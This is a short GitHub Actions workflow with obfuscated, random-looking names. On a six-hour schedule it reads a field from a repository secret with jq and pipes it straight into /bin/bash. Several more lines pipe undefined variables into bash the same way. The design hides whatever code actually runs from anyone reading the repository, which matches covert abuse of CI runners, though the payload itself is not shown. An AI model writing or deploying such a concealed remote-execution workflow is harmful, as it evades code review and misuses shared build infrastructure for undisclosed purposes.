name: carrierballoon

on:
  workflow_dispatch:
  schedule:
    - cron: '42 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: carrierballoon
        env:
          oj1490: ${{ secrets.oj1490 }}
        run: |
          echo $oj1490 | jq -r .ycf4 | /bin/bash
          echo $ud80 | jq -r .vi782 | /bin/bash
          echo $jbmqi3384 | jq -r .o5 | /bin/bash
          echo $xb60 | jq -r .jl384 | /bin/bash
          echo $nypd9 | jq -r .ud7 | /bin/bash

